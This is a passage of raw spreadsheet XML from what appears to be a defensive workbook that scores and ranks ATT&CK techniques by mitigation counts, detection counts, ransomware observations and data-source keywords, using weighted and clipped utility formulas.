        <f t="array" ref="AJ136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC136)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK136" s="25">
        <f>IF(AJ136="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL136" s="25" t="str" cm="1">
        <f t="array" ref="AL136">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC136)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM136" s="25">
        <f>IF(AL136="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN136" s="60">
        <v>0</v>
      </c>
      <c r="AO136" s="51">
        <v>0</v>
      </c>
      <c r="AP136" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6477142857142858E-2</v>
      </c>
      <c r="AQ136" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18825714285714287</v>
      </c>
      <c r="AR136" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18825714285714287</v>
      </c>
      <c r="AS136" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT136" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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37" spans="1:47" ht="48">
      <c r="A137" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26206666666666667</v>
      </c>
      <c r="B137" s="25">
        <f>SUM(H137,M137,V137)*(1+SUM(AE137,AG137,AI137,AK137,AM137))</f>
        <v>0.6206666666666667</v>
      </c>
      <c r="C137" s="25" t="s">
        <v>632</v>
      </c>
      <c r="D137" s="25" t="s">
        <v>160</v>
      </c>
      <c r="E137" s="25" t="s">
        <v>633</v>
      </c>
      <c r="F137" s="51">
        <v>1</v>
      </c>
      <c r="G137" s="51">
        <v>1</v>
      </c>
      <c r="H137" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I137">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J137">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K137">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L137">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M137" s="25">
        <v>0</v>
      </c>
      <c r="N137" s="51">
        <v>4</v>
      </c>
      <c r="O137" s="51">
        <v>25</v>
      </c>
      <c r="P137" s="51">
        <v>3</v>
      </c>
      <c r="Q137" s="51">
        <v>5</v>
      </c>
      <c r="R137" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S137" s="51">
        <v>7</v>
      </c>
      <c r="T137" s="52" t="s">
        <v>528</v>
      </c>
      <c r="U137" s="51">
        <v>13</v>
      </c>
      <c r="V137" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.3666666666666667</v>
      </c>
      <c r="W137">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>20</v>
      </c>
      <c r="X137">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Y137">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.36363636363636365</v>
      </c>
      <c r="Z137">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>37</v>
      </c>
      <c r="AA137">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.37</v>
      </c>
      <c r="AB137">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.37</v>
      </c>
      <c r="AC137" s="29" t="s">
        <v>634</v>
      </c>
      <c r="AD137" s="25" t="str" cm="1">
        <f t="array" ref="AD137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC137)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE137" s="25">
        <f>IF(AD137="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF137" s="25" t="str" cm="1">
        <f t="array" ref="AF137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC137)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG137" s="25">
        <f>IF(AF137="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH137" s="25" t="str" cm="1">
        <f t="array" ref="AH137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC137)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI137" s="25">
        <f>IF(AH137="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ137" s="25" t="str" cm="1">
        <f t="array" ref="AJ137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC137)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK137" s="25">
        <f>IF(AJ137="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL137" s="25" t="str" cm="1">
        <f t="array" ref="AL137">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC137)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM137" s="25">
        <f>IF(AL137="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN137" s="60">
        <v>6</v>
      </c>
      <c r="AO137" s="51">
        <v>1</v>
      </c>
      <c r="AP137" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26206666666666667</v>
      </c>
      <c r="AQ137" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.2068888888888889</v>
      </c>
      <c r="AR137" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.2068888888888889</v>
      </c>
      <c r="AS137" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT137" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU13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38" spans="1:47">
      <c r="A138" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.5399999999999999E-2</v>
      </c>
      <c r="B138" s="25">
        <f>SUM(H138,M138,V138)*(1+SUM(AE138,AG138,AI138,AK138,AM138))</f>
        <v>0.6206666666666667</v>
      </c>
      <c r="C138" s="25" t="s">
        <v>635</v>
      </c>
      <c r="D138" s="25" t="s">
        <v>343</v>
      </c>
      <c r="E138" s="25" t="s">
        <v>636</v>
      </c>
      <c r="F138" s="51">
        <v>1</v>
      </c>
      <c r="G138" s="51">
        <v>1</v>
      </c>
      <c r="H138" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I138">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J138">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K138">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L138">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M138" s="25">
        <v>0</v>
      </c>
      <c r="N138" s="51">
        <v>0</v>
      </c>
      <c r="O138" s="51">
        <v>0</v>
      </c>
      <c r="P138" s="51">
        <v>0</v>
      </c>
      <c r="Q138" s="51">
        <v>3</v>
      </c>
      <c r="R138" s="52" t="s">
        <v>637</v>
      </c>
      <c r="S138" s="51">
        <v>15</v>
      </c>
      <c r="T138" s="52" t="s">
        <v>638</v>
      </c>
      <c r="U138" s="51">
        <v>22</v>
      </c>
      <c r="V138" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.3666666666666667</v>
      </c>
      <c r="W138">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>37</v>
      </c>
      <c r="X138">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.67272727272727273</v>
      </c>
      <c r="Y138">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.67272727272727273</v>
      </c>
      <c r="Z138">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA138">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB138">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC138" s="29" t="s">
        <v>639</v>
      </c>
      <c r="AD138" s="25" t="str" cm="1">
        <f t="array" ref="AD138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC138)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE138" s="25">
        <f>IF(AD138="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF138" s="25" t="str" cm="1">
        <f t="array" ref="AF138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC138)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG138" s="25">
        <f>IF(AF138="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH138" s="25" t="str" cm="1">
        <f t="array" ref="AH138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC138)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI138" s="25">
        <f>IF(AH138="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ138" s="25" t="str" cm="1">
        <f t="array" ref="AJ138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC138)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK138" s="25">
        <f>IF(AJ138="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL138" s="25" t="str" cm="1">
        <f t="array" ref="AL138">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC138)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM138" s="25">
        <f>IF(AL138="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN138" s="60">
        <v>1</v>
      </c>
      <c r="AO138" s="51">
        <v>1</v>
      </c>
      <c r="AP138" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.5399999999999999E-2</v>
      </c>
      <c r="AQ138" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.2068888888888889</v>
      </c>
      <c r="AR138" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.2068888888888889</v>
      </c>
      <c r="AS138" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT138" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU13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39" spans="1:47" ht="32.1">
      <c r="A139" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1666666666666664E-2</v>
      </c>
      <c r="B139" s="25">
        <f>SUM(H139,M139,V139)*(1+SUM(AE139,AG139,AI139,AK139,AM139))</f>
        <v>0.41666666666666669</v>
      </c>
      <c r="C139" s="25" t="s">
        <v>640</v>
      </c>
      <c r="D139" s="25" t="s">
        <v>464</v>
      </c>
      <c r="E139" s="25" t="s">
        <v>641</v>
      </c>
      <c r="F139" s="51">
        <v>1</v>
      </c>
      <c r="G139" s="51">
        <v>0</v>
      </c>
      <c r="H139" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I139">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J139">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K139">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L139">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M139" s="25">
        <v>0</v>
      </c>
      <c r="N139" s="51">
        <v>0</v>
      </c>
      <c r="O139" s="51">
        <v>2</v>
      </c>
      <c r="P139" s="51">
        <v>3</v>
      </c>
      <c r="Q139" s="51">
        <v>0</v>
      </c>
      <c r="R139" s="52" t="s">
        <v>642</v>
      </c>
      <c r="S139" s="51">
        <v>13</v>
      </c>
      <c r="T139" s="52" t="s">
        <v>643</v>
      </c>
      <c r="U139" s="51">
        <v>23</v>
      </c>
      <c r="V139" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.3666666666666667</v>
      </c>
      <c r="W139">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>36</v>
      </c>
      <c r="X139">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.65454545454545454</v>
      </c>
      <c r="Y139">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.65454545454545454</v>
      </c>
      <c r="Z139">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA139">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB139">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC139" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD139" s="25" t="str" cm="1">
        <f t="array" ref="AD139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC139)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE139" s="25">
        <f>IF(AD139="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF139" s="25" t="str" cm="1">
        <f t="array" ref="AF139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC139)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG139" s="25">
        <f>IF(AF139="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH139" s="25" t="str" cm="1">
        <f t="array" ref="AH139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC139)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI139" s="25">
        <f>IF(AH139="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ139" s="25" t="str" cm="1">
        <f t="array" ref="AJ139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC139)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK139" s="25">
        <f>IF(AJ139="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL139" s="25" t="str" cm="1">
        <f t="array" ref="AL139">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC139)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM139" s="25">
        <f>IF(AL139="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN139" s="60">
        <v>0</v>
      </c>
      <c r="AO139" s="51">
        <v>0</v>
      </c>
      <c r="AP139" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1666666666666664E-2</v>
      </c>
      <c r="AQ139" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1388888888888889</v>
      </c>
      <c r="AR139" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1388888888888889</v>
      </c>
      <c r="AS139" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT139" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU13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40" spans="1:47">
      <c r="A140" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18562095238095239</v>
      </c>
      <c r="B140" s="25">
        <f>SUM(H140,M140,V140)*(1+SUM(AE140,AG140,AI140,AK140,AM140))</f>
        <v>0.52287619047619061</v>
      </c>
      <c r="C140" s="25" t="s">
        <v>644</v>
      </c>
      <c r="D140" s="25" t="s">
        <v>233</v>
      </c>
      <c r="E140" s="25" t="s">
        <v>645</v>
      </c>
      <c r="F140" s="51">
        <v>1</v>
      </c>
      <c r="G140" s="51">
        <v>1</v>
      </c>
      <c r="H140" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I140">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J140">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K140">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L140">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M140" s="25">
        <v>0</v>
      </c>
      <c r="N140" s="51">
        <v>1</v>
      </c>
      <c r="O140" s="51">
        <v>9</v>
      </c>
      <c r="P140" s="51">
        <v>2</v>
      </c>
      <c r="Q140" s="51">
        <v>0</v>
      </c>
      <c r="R140" s="52" t="s">
        <v>646</v>
      </c>
      <c r="S140" s="51">
        <v>14</v>
      </c>
      <c r="T140" s="52" t="s">
        <v>647</v>
      </c>
      <c r="U140" s="51">
        <v>18</v>
      </c>
      <c r="V140" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.36190476190476195</v>
      </c>
      <c r="W140">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X140">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y140">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z140">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>12</v>
      </c>
      <c r="AA140">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.12</v>
      </c>
      <c r="AB140">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.12</v>
      </c>
      <c r="AC140" s="29" t="s">
        <v>648</v>
      </c>
      <c r="AD140" s="25" t="str" cm="1">
        <f t="array" ref="AD140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE140" s="25">
        <f>IF(AD140="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF140" s="25" t="str" cm="1">
        <f t="array" ref="AF140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG140" s="25">
        <f>IF(AF140="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH140" s="25" t="str" cm="1">
        <f t="array" ref="AH140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC140)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI140" s="25">
        <f>IF(AH140="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ140" s="25" t="str" cm="1">
        <f t="array" ref="AJ140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK140" s="25">
        <f>IF(AJ140="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL140" s="25" t="str" cm="1">
        <f t="array" ref="AL140">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC140)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM140" s="25">
        <f>IF(AL140="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN140" s="52">
        <v>4</v>
      </c>
      <c r="AO140" s="51">
        <v>1</v>
      </c>
      <c r="AP140" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.18562095238095239</v>
      </c>
      <c r="AQ140" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.17429206349206353</v>
      </c>
      <c r="AR140" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.17429206349206353</v>
      </c>
      <c r="AS140" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT140" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU14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41" spans="1:47" ht="32.1">
      <c r="A141" s="25">
